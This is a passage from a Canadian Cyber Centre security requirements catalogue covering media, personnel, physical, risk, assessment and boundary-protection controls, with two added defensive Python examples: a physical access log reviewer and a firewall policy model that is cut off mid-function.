obtaining records of transport activities as the media move through the transportation system to prevent and detect loss, destruction, or tampering. 
This requirement is related to <a href="#03-13-08">Transmission and storage confidentiality 03.13.08</a> and <a href="#03-13-11">Cryptographic protection 03.13.11</a>.</p> <h5>References</h5> <p>Source controls: MP-05, SC-28<br /> Supporting publications: <a href="https://csrc.nist.gov/pubs/sp/800/111/final">NIST SP 800-111 Guide to Storage Encryption Technologies for End User Devices</a></p> </details><h4 id="03-08-06">03.08.06 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-08-07">03.08.07 Media use</h4> </summary><ol class="lst-upr-alph"><li>Restrict or prohibit the use of [Assignment: organization-defined types of system media]</li> <li>Prohibit the use of removable system media without an identifiable owner</li> </ol><h5>Discussion</h5> <p>In contrast to requirement <a href="#03-08-01">Media storage 03.08.01</a>, which restricts user access to media, this requirement restricts or prohibits the use of certain types of media, such as external hard drives, flash drives, or smart displays. Organizations can use technical and non-technical measures (e.g., policies, procedures, and rules of behaviour) to control the use of system media. For example, organizations may control the use of portable storage devices by using physical cages on workstations to prohibit access to external ports or disabling or removing the ability to insert, read, or write to devices.</p> <p>Organizations may limit the use of portable storage devices to only approved devices, including devices provided by the organization, devices provided by other approved organizations, and devices that are not personally owned. Organizations may also control the use of portable storage devices based on the type of device — prohibiting the use of writeable, portable devices — and implement this restriction by disabling or removing the capability to write to such devices. 
Limits on the use of organization-controlled system media in external systems include restrictions on how the media may be used and under what conditions. Requiring identifiable owners (e.g., individuals, organizations, or projects) for removable system media reduces the risk of using such technologies by allowing organizations to assign responsibility and accountability for addressing known vulnerabilities in the media (e.g., insertion of malicious code).</p> <h5>References</h5> <p>Source control: MP-07<br /> Supporting publications: <a href="https://csrc.nist.gov/pubs/sp/800/111/final">NIST SP 800-111 Guide to Storage Encryption Technologies for End User Devices</a></p> </details><h4 id="03-08-08">03.08.08 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-08-09">03.08.09 System backup – cryptographic protection</h4> </summary><ol class="lst-upr-alph"><li>Protect the confidentiality of backup information</li> <li>Implement cryptographic mechanisms to prevent the unauthorized disclosure of specified information at backup storage locations</li> </ol><h5>Discussion</h5> <p>The selection of cryptographic mechanisms is based on the need to protect the confidentiality of backup information. Hardware security module (HSM) devices safeguard and manage cryptographic keys and provide cryptographic processing. Cryptographic operations (e.g., encryption, decryption, and signature generation and verification) are typically hosted on the <abbr title="hardware security module">HSM</abbr> device, and many implementations provide hardware-accelerated mechanisms for cryptographic operations. 
This requirement is related to <a href="#03-13-11">Cryptographic protection 03.13.11</a>.</p> <h5>References</h5> <p>Source controls: CP-09, CP-09(08)<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/34/r1/upd1/final">NIST SP 800-34 Contingency Planning Guide for Federal Information Systems</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/130/final">NIST SP 800-130 A Framework for Designing Cryptographic Key Management Systems</a></li> </ul></details></section> <section><h3 class="h2 mrgn-tp-lg" id="3-9">3.9 Personnel security</h3> <p>The Personnel security controls support the procedures required to ensure that all personnel who have access to systems have the necessary authorizations as well as appropriate security screening levels. 
They ensure that organizational information and systems are protected during and after personnel actions such as terminations and transfers.</p> <details><summary><h4 id="03-09-01">03.09.01 Personnel screening</h4> </summary><ol class="lst-upr-alph"><li>Screen individuals prior to authorizing access to the system</li> <li>Rescreen individuals in accordance with [Assignment: organization-defined conditions requiring rescreening]</li> </ol><h5>Discussion</h5> <p>Personnel security screening activities involve the assessment of the conduct, integrity, judgment, loyalty, reliability, and stability of an individual (i.e., the individual’s trustworthiness) prior to authorizing access to the system or when elevating system access. The screening and rescreening activities reflect applicable federal laws, Orders in Council, directives, policies, regulations, and criteria established for the level of access required for the assigned positions.</p> <h5>References</h5> <p>Source control: PS-03<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/181/r1/final">NIST SP 800-181 Workforce Framework for Cybersecurity (NICE Framework) </a></li> <li><a href="https://www.tpsgc-pwgsc.gc.ca/esc-src/msc-csm/index-eng.html">PSPC Contract Security Manual </a></li> </ul></details><details><summary><h4 id="03-09-02">03.09.02 Personnel termination and transfer</h4> </summary><ol class="lst-upr-alph"><li>When individual employment is terminated: <ol><li>disable system access within [Assignment: organization-defined time period]</li> <li>terminate or revoke authenticators and credentials associated with the individual</li> <li>retrieve security-related system property</li> </ol></li> <li>When individuals are reassigned or transferred to other 
positions in the organization: <ol><li>review and confirm the ongoing operational need for current logical and physical access authorizations to the system and facility</li> <li>modify access authorization to correspond with any changes in operational need</li> </ol></li> </ol><h5>Discussion</h5> <p>Security-related system property includes hardware authentication tokens, system administration technical manuals, keys, identification cards, and building passes. Exit interviews ensure that terminated individuals understand the security constraints imposed by being former employees and that accountability is achieved for the organizational property. Security topics at exit interviews include reminding individuals of potential limitations on future employment and nondisclosure agreements. Exit interviews may not always be possible for some individuals, including in cases related to the unavailability of supervisors, illnesses, or job abandonment.</p> <p>The timely execution of termination actions is essential for individuals who have been terminated for cause. Organizations may consider disabling the accounts of individuals who are being terminated prior to the individuals being notified. This requirement applies to the reassignment or transfer of individuals when the personnel action is permanent or of such extended duration as to require protection. 
Protections that may be required for transfers or reassignments to other positions within organizations include returning old and issuing new identification cards, keys, and building passes; changing system access authorizations (i.e., privileges); closing system accounts and establishing new accounts; and providing access to official records to which individuals had access at previous work locations in previous system accounts.</p> <h5>References</h5> <p>Source controls: PS-04, PS-05<br /> Supporting publications: None</p> </details></section> <section><h3 class="h2 mrgn-tp-lg" id="3-10">3.10 Physical protection</h3> <p>The Physical protection controls support the control of physical access to systems, equipment, and the respective operating environments to authorized individuals. 
They facilitate the protection of the physical plant and support infrastructure for systems, the protection of systems against environmental hazards, and provide appropriate environmental controls in facilities containing systems.</p> <details><summary><h4 id="03-10-01">03.10.01 Physical access authorizations</h4> </summary><ol class="lst-upr-alph"><li>Develop, approve, and maintain a list of individuals with authorized access to the physical location where the system resides</li> <li>Issue authorization credentials for physical access</li> <li>Review the physical access list [Assignment: organization-defined frequency]</li> <li>Remove individuals from the physical access list when access is no longer required</li> </ol><h5>Discussion</h5> <p>A facility can include one or more physical locations containing systems or system components that process, store, or transmit specified information. Physical access authorizations apply to employees and visitors. Individuals with permanent physical access authorization credentials are not considered visitors. Authorization credentials include identification badges, identification cards, and smart cards. Organizations determine the strength of the authorization credentials consistent with applicable laws, Orders in Council, directives, regulations, policies, standards, and guidelines. 
Physical access authorizations may not be necessary to access certain areas within facilities that are designated as publicly accessible.</p> <h5>References</h5> <p>Source control: PE-02<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-10-02">03.10.02 Monitoring physical access</h4> </summary><ol class="lst-upr-alph"><li>Monitor physical access to the facility where the system resides to detect and respond to physical security incidents</li> <li>Review physical access logs [Assignment: organization-defined frequency] and upon occurrence of [Assignment: organization-defined events or potential indications of events]</li> </ol><h5>Discussion</h5> <p>A facility can include one or more physical locations containing systems or system components that process, store, or transmit specified information. Physical access monitoring includes publicly accessible areas within organizational facilities. Examples of physical access monitoring include guards, video surveillance equipment (i.e., cameras), and sensor devices. Reviewing physical access logs can help identify suspicious activity, anomalous events, or potential threats. The reviews can be supported by audit logging controls if the access logs are part of an automated system. Incident response capabilities include investigations of physical security incidents and responses to those incidents. 
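</p> <p>Reviewing physical access logs for the anomaly types this requirement's discussion names (entry outside normal work hours, repeated access to an area a badge holder does not normally use, unusually long presence, and out-of-sequence entry and exit), as an added example that is not the Cyber Centre's code: the badge-reader export format, the per-badge baseline, the work hours and the dwell limits are constructed assumptions.</p>

```python
"""Physical access log review (03.10.02): flag entry outside normal work
hours, repeated access to an area outside a badge holder's baseline, presence
longer than an area's limit, and out-of-sequence IN/OUT events. Added example,
not the Cyber Centre's code; the log export format, baseline, hours and
thresholds are constructed."""
import csv
import io
from collections import Counter
from datetime import datetime, timedelta

# Constructed badge-reader export: one IN or OUT event per line.
SAMPLE_LOG = """\
timestamp,badge,area,event
2025-03-03T08:02:00,B100,office,IN
2025-03-03T09:15:00,B100,server_room,IN
2025-03-03T09:40:00,B100,server_room,OUT
2025-03-03T17:05:00,B100,office,OUT
2025-03-03T08:10:00,B200,office,IN
2025-03-03T12:00:00,B200,server_room,IN
2025-03-03T12:05:00,B200,server_room,IN
2025-03-03T18:30:00,B200,server_room,OUT
2025-03-03T18:45:00,B200,office,OUT
2025-03-03T23:10:00,B200,server_room,IN
2025-03-03T23:30:00,B200,server_room,OUT
2025-03-04T07:30:00,B300,server_room,OUT
"""

# Constructed review parameters (organization-defined in practice).
WORK_HOURS = (7, 19)                             # entries before 07:00 or from 19:00 are after hours
MAX_DWELL = {"server_room": timedelta(hours=4)}  # areas with a presence limit
BASELINE = {"B100": {"office", "server_room"},   # areas each badge normally accesses
            "B200": {"office"}, "B300": {"office"}}
REPEAT_THRESHOLD = 2                             # entries to a non-baseline area worth flagging


def parse_log(text: str) -> list:
    rows = [{"time": datetime.fromisoformat(r["timestamp"]), "badge": r["badge"],
             "area": r["area"], "event": r["event"]}
            for r in csv.DictReader(io.StringIO(text))]
    rows.sort(key=lambda r: r["time"])  # exports are not always chronological
    return rows


def review_access_log(rows, baseline=BASELINE, work_hours=WORK_HOURS,
                      max_dwell=MAX_DWELL, repeat_threshold=REPEAT_THRESHOLD) -> list:
    findings = []
    inside = {}          # (badge, area) -> time of the still-open IN
    entries = Counter()  # (badge, area) -> number of IN events
    first_entry = {}

    def flag(time, badge, area, kind, detail):
        findings.append({"time": time, "badge": badge, "area": area,
                         "kind": kind, "detail": detail})

    for r in rows:
        key = (r["badge"], r["area"])
        if r["event"] == "IN":
            entries[key] += 1
            first_entry.setdefault(key, r["time"])
            if not work_hours[0] <= r["time"].hour < work_hours[1]:
                flag(r["time"], *key, "after_hours", f"entry at {r['time'].time()}")
            if key in inside:  # second IN with no OUT between: reader bypassed or log gap
                flag(r["time"], *key, "out_of_sequence",
                     f"IN while already inside since {inside[key].time()}")
            else:
                inside[key] = r["time"]
        elif r["event"] == "OUT":
            if key not in inside:  # exit with no recorded entry
                flag(r["time"], *key, "out_of_sequence", "OUT without recorded IN")
                continue
            dwell = r["time"] - inside.pop(key)
            limit = max_dwell.get(r["area"])
            if limit is not None and dwell > limit:
                flag(r["time"], *key, "long_dwell", f"present {dwell}, limit {limit}")

    # Repeated access to an area outside the badge holder's normal pattern.
    for key, n in entries.items():
        badge, area = key
        if area not in baseline.get(badge, set()) and n >= repeat_threshold:
            flag(first_entry[key], badge, area, "repeated_unusual_area",
                 f"{n} entries to an area not in baseline")

    findings.sort(key=lambda f: (f["time"], f["kind"]))
    return findings


if __name__ == "__main__":
    for f in review_access_log(parse_log(SAMPLE_LOG)):
        print(f["time"], f["badge"], f["area"], f["kind"], "-", f["detail"])
```

<p>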
Incidents include security violations or suspicious physical access activities, such as access outside of normal work hours, repeated access to areas not normally accessed, access for unusual lengths of time, and out-of-sequence access.</p> <h5>References</h5> <p>Source control: PE-06<br /> Supporting publications: None</p> </details><h4 id="03-10-03">03.10.03 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <h4 id="03-10-04">03.10.04 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <h4 id="03-10-05">03.10.05 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-10-06">03.10.06 Alternate work site</h4> </summary><ol class="lst-upr-alph"><li>Determine alternate work sites allowed for use by employees</li> <li>Employ the following security requirements at alternate work sites: [Assignment: organization-defined security requirements]</li> </ol><h5>Discussion</h5> <p>Alternate work sites include the private residences of employees or other facilities designated by the organization. Alternate work sites can provide readily available alternate locations during contingency operations. Organizations can define different security requirements for specific alternate work sites or types of sites, depending on the work-related activities conducted at the sites. 
Assessing the effectiveness of the requirements and providing a means to communicate incidents at alternate work sites supports the contingency planning activities of organizations.</p> <h5>References</h5> <p>Source control: PE-17<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/end-user-device-security-bring-your-own-device-byod-deployment-models-itsm70003">Cyber Centre End user device security for Bring-Your-Own-Device (BYOD) deployment models (ITSM.70.003) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/46/r2/final">NIST SP 800-46 Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/114/r1/final">NIST SP 800-114 User’s Guide to Telework and Bring Your Own Device (BYOD) Security</a></li> </ul></details><details><summary><h4 id="03-10-07">03.10.07 Physical access control</h4> </summary><ol class="lst-upr-alph"><li>Enforce physical access authorizations at entry and exit points to the facility where the system resides by: <ol><li>verifying individual physical access authorizations before granting access to the facility</li> <li>controlling ingress and egress with physical access control systems, devices or guards</li> </ol></li> <li>Maintain physical access audit logs for entry or exit points</li> <li>Escort visitors and control visitor activity</li> <li>Secure keys, combinations, and other physical access devices</li> <li>Control physical access to output devices to prevent unauthorized individuals from obtaining access to specified information</li> </ol><h5>Discussion</h5> <p>This requirement addresses physical locations containing systems or system components that process, store, or transmit specified information. Organizations determine the types of guards needed, including professional security staff or administrative staff. Physical access devices include keys, locks, combinations, biometric readers, and card readers. 
Physical access control systems comply with applicable laws, Orders in Council, directives, policies, regulations, standards, and guidelines. Organizations have flexibility in the types of audit logs employed. Audit logs can be procedural, automated, or some combination thereof. Physical access points can include exterior access points, interior access points to systems that require supplemental access controls, or both. Physical access control applies to employees and visitors. Individuals with permanent physical access authorizations are not considered visitors.</p> <p>Controlling physical access to output devices includes placing output devices in locked rooms or other secured areas with keypad or card reader access controls and only allowing access to authorized individuals, placing output devices in locations that can be monitored by personnel, installing monitor or screen filters, and using headphones. Examples of output devices include monitors, printers, scanners, facsimile machines, audio devices, and copiers.</p> <h5>References</h5> <p>Source controls: PE-03, PE-05<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-10-08">03.10.08 Access control for transmission</h4> </summary><p>Control physical access to system distribution and transmission lines in organizational facilities.</p> <h5>Discussion</h5> <p>Safeguarding measures applied to system distribution and transmission lines prevent accidental damage, disruption, and physical tampering. Such measures may also be necessary to prevent eavesdropping or the modification of unencrypted transmissions. 
Safeguarding measures used to control physical access to system distribution and transmission lines include disconnected or locked spare jacks, locked wiring closets, protecting cabling with conduit or cable trays, and wiretapping sensors.</p> <h5>References</h5> <p>Source control: PE-04<br /> Supporting publications: None</p> </details></section> <section><h3 class="h2 mrgn-tp-lg" id="3-11">3.11 Risk assessment</h3> <p>The Risk assessment controls deal with the periodic conduct of risk assessments, including privacy impact assessments, resulting from the operation of organizational systems and associated handling, storage, or transmission of data and information.</p> <details><summary><h4 id="03-11-01">03.11.01 Risk assessment</h4> </summary><ol class="lst-upr-alph"><li>Assess the risk (including supply chain risk) of unauthorized disclosure resulting from the handling, processing, storage, or transmission of specified information</li> <li>Update risk assessments [Assignment: organization-defined frequency]</li> </ol><h5>Discussion</h5> <p>Establishing the system boundary is a prerequisite to assessing the risk of unauthorized disclosure of specified information.
Risk assessments consider threats, vulnerabilities, likelihood, and adverse impacts to organizational operations and assets based on the operation and use of the system and the unauthorized disclosure of specified information. Risk assessments also consider risks from external parties (e.g., contractors operating systems on behalf of the organization, service providers, individuals accessing systems, and outsourcing entities). Risk assessments can be conducted at the organization level, the mission or business process level, or the system level and at any phase in the system development life cycle. Risk assessments include supply chain-related risks associated with suppliers or contractors and the system, system component, or system service that they provide.</p> <h5>References</h5> <p>Source controls: RA-03, RA-03(01), SR-06<br /> Supporting publications:</p> <ul><li><a href="/en/tools-services/harmonized-tra-methodology">CSE-<abbr title="Royal Canadian Mounted Police">RCMP</abbr> Harmonized Threat and Risk Assessment Methodology (TRA-1)</a></li> <li><a href="/en/guidance/cyber-supply-chain-approach-assessing-risk-itsap10070">Cyber Centre Cyber supply chain: An approach to assessing risk (ITSAP.10.070)</a></li> <li><a href="/en/guidance/supply-chain-security-small-and-medium-sized-organizations-itsap00070">Cyber Centre Supply chain security for small and medium-sized organizations (ITSAP.00.070)</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/30/r1/final">NIST SP 800-30 Guide for Conducting Risk Assessments</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/161/r1/final">NIST SP 800-161 Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations</a></li> </ul></details><details><summary><h4 id="03-11-02">03.11.02 Vulnerability monitoring and scanning</h4> </summary><ol class="lst-upr-alph"><li>Monitor and scan for vulnerabilities in the system [Assignment: organization-defined frequency] and when new vulnerabilities affecting 
the system are identified</li> <li>Remediate system vulnerabilities within [Assignment: organization-defined response times]</li> <li>Update system vulnerabilities to be scanned [Assignment: organization-defined frequency] and when new vulnerabilities are identified and reported</li> </ol><h5>Discussion</h5> <p>Organizations determine the required vulnerability scanning for system components and ensure that potential sources of vulnerabilities (e.g., networked printers, scanners, and copiers) are not overlooked. Vulnerability analyses for custom software may require additional approaches, such as static analysis, dynamic analysis, or binary analysis. Organizations can use these approaches in source code reviews and tools (e.g., static analysis tools, web-based application scanners, binary analyzers). Vulnerability scanning includes scanning for patch levels; scanning for functions, ports, protocols, and services that should not be accessible to users or devices; and scanning for improperly configured or incorrectly operating flow control mechanisms.</p> <p>To facilitate interoperability, organizations consider using scanning tools that express vulnerabilities in the Common Vulnerabilities and Exposures (CVE) naming convention. 
Sources for vulnerability information also include the Common Weakness Enumeration (CWE) listing, the National Vulnerability Database (NVD), and the Common Vulnerability Scoring System (CVSS).</p> <h5>References</h5> <p>Source controls: RA-05, RA-05(02)<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/40/r4/final">NIST SP 800-40 Guide to Enterprise Patch Management Planning: Preventive Maintenance for Technology</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/53/a/r5/final">NIST SP 800-53A Assessing Security and Privacy Controls in Information Systems and Organizations</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/70/r4/final">NIST SP 800-70 National Checklist Program for <abbr title="information technology">IT</abbr> Products: Guidelines for Checklist Users and Developers</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/115/final">NIST SP 800-115 Technical Guide to Information Security Testing and Assessment</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/126/r3/final">NIST SP 800-126 The Technical Specification for the Security Content Automation Protocol (SCAP): SCAP Version 1.3</a></li> <li><a href="/en/guidance/top-10-it-security-action-items-no2-patch-operating-systems-and-applications-itsm10096">Cyber Centre Top 10 <abbr title="information technology">IT</abbr> security actions: No.2 patch operating systems and applications (ITSM.10.096)</a></li> </ul></details><h4 id="03-11-03">03.11.03 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-11-04">03.11.04 Risk response</h4> </summary><p>Respond to findings from security assessments, monitoring, and audits.</p> <h5>Discussion</h5> <p>This requirement addresses the need to determine an appropriate response to risk before generating a plan of action and milestones (POAM) entry. 
It may be possible to mitigate the risk immediately so that a <abbr title="plan of action and milestones">POAM</abbr> entry is not needed. However, a <abbr title="plan of action and milestones">POAM</abbr> entry is generated if the risk response is to mitigate the identified risk and the mitigation cannot be completed immediately.</p> <h5>References</h5> <p>Source control: RA-07<br /> Supporting publications:</p> <ul><li>Cyber Centre Organizational cyber security and privacy risk management activities (ITSP.10.036)</li> <li>Cyber Centre System lifecycle cyber security and privacy risk management activities (ITSP.10.037)</li> <li><a href="https://csrc.nist.gov/pubs/sp/800/160/v1/r1/final">NIST SP 800-160-1 Engineering Trustworthy Secure Systems</a></li> </ul></details></section> <section><h3 class="h2 mrgn-tp-lg" id="3-12">3.12 Security assessment and monitoring</h3> <p>The Security assessment and monitoring controls deal with the security assessment and monitoring of the system.</p> <details><summary><h4 id="03-12-01">03.12.01 Security assessment</h4> </summary><p>Assess the security and privacy requirements for the system and its environment of operation [Assignment: organization-defined frequency] to determine if the requirements have been satisfied.</p> <h5>Discussion</h5> <p>By assessing the security and
privacy requirements, organizations determine whether the necessary safeguards and countermeasures are implemented correctly, operating as intended, and producing the desired outcome. Security assessments identify weaknesses and deficiencies in the system and provide the essential information needed to make risk-based decisions. Security and privacy assessment reports document assessment results in sufficient detail as deemed necessary by the organization to determine the accuracy and completeness of the reports. Security assessment results are provided to the individuals or roles appropriate for the types of assessments being conducted.</p> <h5>References</h5> <p>Source control: CA-02<br /> Supporting publications:</p> <ul><li>Cyber Centre Security and privacy controls and assurance activities catalogue (ITSP.10.033)</li> <li>Cyber Centre Organizational cyber security and privacy risk management activities (ITSP.10.036)</li> <li>Cyber Centre System lifecycle cyber security and privacy risk management activities (ITSP.10.037)</li> <li><a href="https://www.cyber.gc.ca/en/tools-services/harmonized-tra-methodology">CSE-<abbr title="Royal Canadian Mounted Police">RCMP</abbr> Harmonized Threat and Risk Assessment Methodology (TRA-1)</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/115/final">NIST SP 800-115 Technical Guide to Information Security Testing and Assessment</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/53/a/r5/final">NIST SP 800-53A Assessing Security and Privacy Controls in Information Systems and Organizations</a></li> </ul></details><details><summary><h4 id="03-12-02">03.12.02 Plan of action and milestones</h4> </summary><ol class="lst-upr-alph"><li>Develop a plan of action and milestones (POAMs) for the system to: <ol><li>document the planned remediation actions to correct weaknesses or deficiencies noted during security assessments</li> <li>reduce or eliminate known system vulnerabilities</li> </ol></li> <li>Update the existing <abbr 
title="plan of action and milestones">POAM</abbr>s based on the findings from: <ol><li>security assessments</li> <li>audits or reviews</li> <li>continuous monitoring activities</li> </ol></li> </ol><h5>Discussion</h5> <p><abbr title="plan of action and milestones">POAM</abbr>s are important documents in organizational security and privacy programs. Organizations use <abbr title="plan of action and milestones">POAM</abbr>s to describe how unsatisfied security requirements will be met and how planned mitigations will be implemented. Organizations can document system security plans and <abbr title="plan of action and milestones">POAM</abbr>s as separate or combined documents and in any format.</p> <h5>References</h5> <p>Source control: CA-05<br /> Supporting publications: Cyber Centre Organizational cyber security and privacy risk management activities (ITSP.10.036)</p> </details><details><summary><h4 id="03-12-03">03.12.03 Continuous monitoring</h4> </summary><p>Develop and implement a system-level continuous monitoring strategy that includes ongoing monitoring and security assessments.</p> <h5>Discussion</h5> <p>Continuous monitoring at the system level facilitates ongoing awareness of the system security and privacy posture to support risk management decisions. The terms "continuous" and "ongoing" imply that organizations assess and monitor their systems at a frequency that is sufficient to support risk-based decisions. 
Different types of security and privacy requirements may require different monitoring frequencies.</p> <h5>References</h5> <p>Source control: CA-07<br /> Supporting publications:</p> <ul><li>Cyber Centre Organizational cyber security and privacy risk management activities (ITSP.10.036)</li> <li><a href="https://csrc.nist.gov/pubs/sp/800/115/final">NIST SP 800-115 Technical Guide to Information Security Testing and Assessment</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/137/final">NIST SP 800-137 Information Security Continuous Monitoring (ISCM) for Federal Information Systems and Organizations</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/53/a/r5/final">NIST SP 800-53A Assessing Security and Privacy Controls in Information Systems and Organizations</a></li> </ul></details><h4 id="03-12-04">03.12.04 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-12-05">03.12.05 Information exchange</h4> </summary><ol class="lst-upr-alph"><li>Approve and manage the exchange of specified information between the system and other systems using [Selection (one or more): interconnection security agreements; information exchange security agreements; memoranda of understanding or agreement; information sharing arrangements; service level agreements; user agreements; nondisclosure agreements]</li> <li>Document, as part of the exchange agreements, interface characteristics, security and privacy requirements, and responsibilities for each system</li> <li>Review and update the exchange agreements [Assignment: organization-defined frequency]</li> </ol><h5>Discussion</h5> <p>Information exchange applies to information exchanges between two or more systems, both internal and external to the organization. 
Organizations consider the risks related to new or increased threats that may be introduced when systems exchange information with other systems that may have different security requirements or policies. The types of agreements selected are based on factors such as the relationship between the organizations exchanging information (e.g., government to government, government to business, business to business, government or business to service provider, government or business to individual) and the level of access to the organizational system by users of the other system. The types of agreements can include information exchange security agreements, interconnection security agreements, memoranda of understanding or agreement, information sharing arrangements, service-level agreements, or other types of agreements.</p> <p>Organizations may incorporate agreement information into formal contracts, especially for information exchanges established between federal departments and agencies and non-federal organizations (e.g., service providers, contractors, system developers, and system integrators). 
The types of information contained in exchange agreements include the interface characteristics, security and privacy requirements, controls, and responsibilities for each system.</p> <h5>References</h5> <p>Source control: CA-03<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/baseline-security-requirements-network-security-zones-version-20-itsp80022">Cyber Centre Baseline Security Requirements for Network Security Zones (ITSP.80.022)</a></li> <li><a href="/en/guidance/network-security-zoning-design-considerations-placement-services-within-zones-itsg-38">Cyber Centre Network security zoning – Design considerations for placement of services within zones (ITSG-38)</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/47/r1/final">NIST SP 800-47 Managing the Security of Information Exchanges</a></li> </ul></details></section> <section><h3 class="h2 mrgn-tp-lg" id="3-13">3.13 System and communications protection</h3> <p>The System and communications protection controls support the monitoring, control and protection of the systems themselves and of the communications between and within the systems.</p> <details><summary><h4 id="03-13-01">03.13.01 Boundary protection</h4> </summary><ol class="lst-upr-alph"><li>Monitor and control communications at the external managed interfaces to the system and key internal managed interfaces within the system</li> <li>Implement subnetworks for publicly accessible system components that are physically or logically separated from internal networks</li> <li>Connect to external systems only through managed interfaces consisting of boundary protection devices arranged in accordance with an organizational security architecture</li> </ol><h5>Discussion</h5> <p>Managed interfaces include gateways, routers, firewalls, network-based malicious code analysis, virtualization systems, and encrypted tunnels implemented within a security architecture. Subnetworks that are either physically or logically separated from internal networks are referred to as demilitarized zones or DMZs.
Restricting or prohibiting interfaces within organizational systems includes restricting external web traffic to designated web servers within managed interfaces, and prohibiting both internal and external address spoofing for protocols crossing the boundary.</p> <h5>References</h5> <p>Source control: SC-07<br /> Supporting publications:</p> <ul><li><a href="https://www.cyber.gc.ca/en/guidance/baseline-security-requirements-network-security-zones-version-20-itsp80022">Cyber Centre Baseline Security Requirements for Network Security Zones (ITSP.80.022)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/network-security-zoning-design-considerations-placement-services-within-zones-itsg-38">Cyber Centre Network security zoning – Design considerations for placement of services within zones (ITSG-38)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/guidance-securely-configuring-network-protocols-itsp40062">Cyber Centre Guidance on Securely Configuring Network Protocols (ITSP.40.062)</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/189/final">NIST SP 800-189 Resilient Interdomain Traffic Exchange: BGP Security and DDoS Mitigation</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/41/r1/final">NIST SP 800-41 Guidelines on Firewalls and Firewall Policy</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/160/v1/r1/final">NIST SP 800-160-1 Engineering Trustworthy Secure Systems</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/125/b/final">NIST SP 800-125B Secure Virtual Network Configuration for Virtual Machine (VM) Protection</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/207/final">NIST SP 800-207 Zero Trust Architecture</a></li> </ul></details><h4 id="03-13-02">03.13.02 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <h4 id="03-13-03">03.13.03 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p>
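<p>The boundary protection discussion in 03.13.01, as an added example that is not part of the Cyber Centre catalogue: a Python model of the decisions a managed interface makes for flows crossing the boundary, restricting external web traffic to the designated DMZ web servers, rejecting inbound traffic that spoofs internal addresses and outbound traffic that spoofs external ones, and denying anything without an approved exception. The address ranges, web servers, egress ports and sample flows are all constructed for illustration.</p>

```python
"""Managed-interface policy check modelling the 03.13.01 discussion.

Added example, not Cyber Centre code. It models a boundary device that
(1) restricts external web traffic to the designated web servers in the
DMZ, (2) prohibits inbound traffic that spoofs internal addresses and
outbound traffic that spoofs external addresses, and (3) denies anything
else by default. All address ranges, host lists, ports and sample flows
are constructed for illustration.
"""
from __future__ import annotations

from dataclasses import dataclass
from ipaddress import IPv4Address, ip_address, ip_network

INTERNAL_NETS = [ip_network("10.0.0.0/8")]          # constructed internal space
DMZ_NET = ip_network("192.0.2.0/24")                # constructed DMZ (TEST-NET-1)
WEB_SERVERS = {ip_address("192.0.2.10"), ip_address("192.0.2.11")}
WEB_PORTS = {80, 443}
APPROVED_EGRESS_PORTS = {53, 443}                   # constructed egress exceptions


@dataclass(frozen=True)
class Flow:
    """One connection attempt seen at the external managed interface."""
    direction: str   # "inbound" (from the Internet) or "outbound" (to it)
    src: str
    dst: str
    dport: int


def is_organizational(addr: IPv4Address) -> bool:
    """True if the address belongs to the internal networks or the DMZ."""
    return addr in DMZ_NET or any(addr in net for net in INTERNAL_NETS)


def evaluate(flow: Flow) -> tuple[str, str]:
    """Return ("allow" | "deny", reason) for a flow crossing the boundary."""
    src, dst = ip_address(flow.src), ip_address(flow.dst)
    if flow.direction == "inbound":
        # Anti-spoofing: traffic arriving from outside must not claim an
        # internal or DMZ source address.
        if is_organizational(src):
            return "deny", "inbound traffic spoofs an internal address"
        # Only the designated DMZ web servers accept external web traffic;
        # internal hosts are never reachable directly from outside.
        if dst in WEB_SERVERS and flow.dport in WEB_PORTS:
            return "allow", "external web traffic to designated web server"
        return "deny", "no approved exception for this destination/port"
    if flow.direction == "outbound":
        # Anti-spoofing: traffic leaving must carry an organizational source.
        if not is_organizational(src):
            return "deny", "outbound traffic spoofs an external address"
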